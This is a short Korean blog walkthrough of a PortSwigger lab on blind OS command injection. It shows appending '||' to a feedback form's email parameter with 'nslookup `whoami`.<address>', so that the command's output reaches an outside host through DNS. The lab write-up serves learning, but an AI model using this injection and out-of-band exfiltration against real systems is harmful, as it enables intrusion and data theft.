WEB hacking/PortSwigger

Lab: Blind OS command injection with out-of-band data exfiltration 문제 풀이(WriteUp)

Roronoa 2025. 2. 17. 01:47
반응형

문제 설명

DNS 쿼리를 통해 whoami 결과 확인

문제 설명

문제 풀이

문제 접속 후 Submit feedback 접근

문제 접속 화면

 

피드백 양식에 맞게 작성 후 요청

피드백 요청

 

피드백 요청 시 email 파라미터에 || 추가 후 Command 삽입

nslookup `whoami`.주소 를 통해 whoami의 결과 값을 포함하여 DNS 질의

email 파라미터 변조

 

도메인 이름 앞부분에 whoami 결과가 담겨져서 요청이 오게 됨

whoami 결과 확인

 

 

 

 

반응형